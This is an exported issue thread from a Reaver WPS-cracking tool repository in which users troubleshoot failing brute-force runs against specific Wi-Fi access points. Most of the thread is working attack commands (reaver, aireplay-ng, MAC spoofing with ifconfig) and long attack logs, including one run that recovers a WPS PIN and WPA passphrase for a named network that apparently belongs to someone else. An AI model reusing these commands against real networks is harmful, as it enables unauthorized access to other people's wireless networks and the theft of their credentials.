ChairmanC / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

WPS transaction failed (code: 0x02), Receive timeout occurred ! #590

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago

1. What operating system are you using (Linux is the only supported OS)?
   # lsb_release -a
   Debian GNU/Linux Kali Linux 1.0
   # uname -a
   Linux muriel 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali8 x86_64 GNU/Linux

2. Is your wireless card in monitor mode (yes/no)?
   # yes, Intel 3945ABG , and i've also tried switching to another instance in monitor mode interfaces (mon1,mon2).

3. What is the signal strength of the Access Point you are trying to crack?
   #07:18:02  Ping (min/avg/max): 0.865ms/6.822ms/32.689ms Power: -80.45
     07:18:02  29/30:  96%

4. What is the manufacturer and model # of the device you are trying to crack?
   # *Manufacturer: CIG
     *Model: CIG GPON ONT RG

5. What is the entire command line string you are supplying to reaver?
   Several, some examples

   ##
$ reaver -i mon0 -b 74:31:70:EB:B4:F8 -vv --dh-small

$ reaver -i mon0 -b 74:31:70:EB:B4:F8 -c 7 -a -S -N -vv --no-nacks --win7 
--dh-small 

$ aireplay-ng -1 0 -a 74:31:70:EB:B4:F8 mon0

6. Please describe what you think the issue is.

   reaver prompts these messages repeatedly on every attempts , even when the traget was my own AP, which happens to be a few fets away ..

[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: Receive timeout occurred

## i just removed "<mac>.wpcs" in /etc/reaver/ .. i shall try again soon!

7. Paste the output from Reaver below.

[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2013-12-10 07:45:27 (0 seconds/pin)
[+] Max time remaining at this rate: (undetermined) (11000 pins left to try)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 74:31:70:EB:B4:F8 (ESSID: 7777777)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.

[+] Session saved.

# and it kept repeating the same pin over & over again!

Original issue reported on code.google.com by sary.sa@me.com on 10 Dec 2013 at 2:17

GoogleCodeExporter commented 9 years ago
So Now, on this attempt I tried with a different target, and of course both 
this AP and the first one doesn't have WPS locked ON! .. the command used in 
this attempt is :

~$ reaver -i mon0 -b 0C:96:BF:79:95:F1 -c 11 -a -S -N -vv --dh-small

reaver outputs :

[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 99.99% complete @ 2013-12-10 09:54:39 (3 seconds/pin)
[+] Max time remaining at this rate: 0:00:03 (1 pins left to try)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 99.99% complete @ 2013-12-10 09:54:52 (3 seconds/pin)
[+] Max time remaining at this rate: 0:00:03 (1 pins left to try)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
^C
[+] Session saved.
root@muriel:~# 

Original comment by sary.sa@me.com on 10 Dec 2013 at 4:01

GoogleCodeExporter commented 9 years ago
As you can see , the progress line i shown " 99.99% complete @ 2013-12-10 
09:54:52 (3 seconds/pin) " , but it's stuck and stuck with same pin aswell!

Original comment by sary.sa@me.com on 10 Dec 2013 at 4:03

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Here is the pcap dump file , i had to cut a big part of it ..

# http://sprunge.us/VWjP

Original comment by sary.sa@me.com on 10 Dec 2013 at 4:55

GoogleCodeExporter commented 9 years ago
The 0C:96:BF:79:95:F1 AP the manufacturer and model # Huawei Technology Corp.
         * Model: RTL8671
         * Model Number: EV-2006-07-27

Original comment by sary.sa@me.com on 10 Dec 2013 at 6:06

GoogleCodeExporter commented 9 years ago
So now am back at the first AP network , when i ran "aireplay-ng -1 0 -a 
74:31:70:EB:B4:F8 mon0" i noticed :

# 11:32:34  Sending Authentication Request (Open System)
11:32:35  AP rejects the source MAC address (00:1B:77:A8:5F:06) ?
Authentication failed (code 1)

11:32:38  Sending Authentication Request (Open System)

So, So, i faked a MAC address for Spoofing ..

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver --mac=00:BA:AD:BE:EF:69 -i mon0 -b 74:31:70:EB:B4:F8 -c 7 -a -S -N -vv 
--dh-small 

I saw the progress line is shown  00.01% complete ..

Original comment by sary.sa@me.com on 10 Dec 2013 at 6:08

GoogleCodeExporter commented 9 years ago
Nope, 74:31:70:EB:B4:F8 is still stuck at the same rate 00.01 with the same pin!

and the other attempt on AP 0C:96:BF:79:95:F1 just ended with a prompt :

[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Quitting after 11000 crack attempts
[-] Failed to recover WPA key
root@muriel:~# 

strange enough, because it did cracked another AP :

[+] Trying pin 77546746
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] 100.00% complete @ 2013-12-11 08:59:31 (7 seconds/pin)
[+] Max time remaining at this rate: 0:00:00 (0 pins left to try)
[+] Pin cracked in 62481 seconds
[+] WPS PIN: '77546746'
[+] WPA PSK: 'ssssbbbb'
[+] AP SSID: 'Basher-almasaby'
root@muriel:~# 

Original comment by sary.sa@me.com on 12 Dec 2013 at 10:26

GoogleCodeExporter commented 9 years ago
same here :(

Original comment by MegaH...@gmail.com on 28 Jun 2014 at 1:56

GoogleCodeExporter commented 9 years ago
Can you guys help us ?

Original comment by saadanim...@gmail.com on 29 Aug 2014 at 11:36

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
root@MrTMB:~# reaver -i mon0 -b 00:1F:3F:2B:9C:3B -S -vv -N -d 15 -c 9

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 9
[+] Waiting for beacon from 00:1F:3F:2B:9C:3B
[+] Associated with 00:1F:3F:2B:9C:3B (ESSID: FRITZ!Box Fon WLAN 7270)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2014-10-24 13:37:55 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
(...)

-Injection is working!
-Hardware I use: TP-Link TL-WN722N

What can I do to prevent this??
Is there a way?
TIA

Original comment by M.K.Zer...@gmail.com on 24 Oct 2014 at 11:58

GoogleCodeExporter commented 9 years ago
Please, help me. I try the second day. 63 seconds / pin is my best result. 
usually about 200 seconds on a pin
root@kali:~# reaver -i mon0 -b 00:26:5A:A0:8C:58 -a -S -N -vv

[+] Trying pin 02595672
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 6
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 2.45% complete @ 2014-11-06 19:43:34 (63 seconds/pin)
[+] Max time remaining at this rate: 187:46:30 (10730 pins left to try)
[+] Trying pin 02605678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

root@kali:~# reaver -i mon0 -b 00:26:5A:A0:8C:58 -c6 -a -S -N -vv not working

root@kali:~# reaver -i mon0 -b 00:26:5A:A0:8C:58 -c 6 -a -S -N -vv --dh-small 
not working

My  wireless card in monitor mode ALFA AWUS036NHR v.2

Original comment by 5921...@gmail.com on 6 Nov 2014 at 5:58